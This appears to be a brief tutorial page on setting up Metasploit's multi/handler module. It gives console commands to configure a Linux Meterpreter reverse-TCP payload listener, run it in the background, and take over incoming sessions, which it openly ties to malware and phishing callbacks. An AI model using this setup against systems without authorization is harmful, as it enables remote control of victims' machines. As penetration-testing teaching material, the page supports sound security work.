Skip to main content

the_multi_handler_module

Sometimes we have to wait for a connection incoming to metasploit, because of a malware a phishing attack or some kind of program which tries to connect back to our machine and we want metasploit to be able to handle this connection, in order to do this we use the multi/handler module, we can do this by issuing the following commands:

use multi/handler
options
info

The multi/handler module is a generic payload handler, it does not have by efault options unless we set up a payload, we can show available payloads with:

show payloads

We can search for linux meterpreter payloads with:

grep linux/x64/meterpreter show payloads

Then we can set the payload with:

set payload linux/x64/meterpreter/reverse_tcp
setg lhost <our-ip-address>

Then we can start the payload handler in background with:

run -j # the -j flag is used to run it in background

We can check background jobs by issuing:

jobs

We can kill jobs as we kill sessions.

Notice that once we establish a connection we can foreground a backgrounded session by issuing:

sessions 1 # this will foregound the session with id 1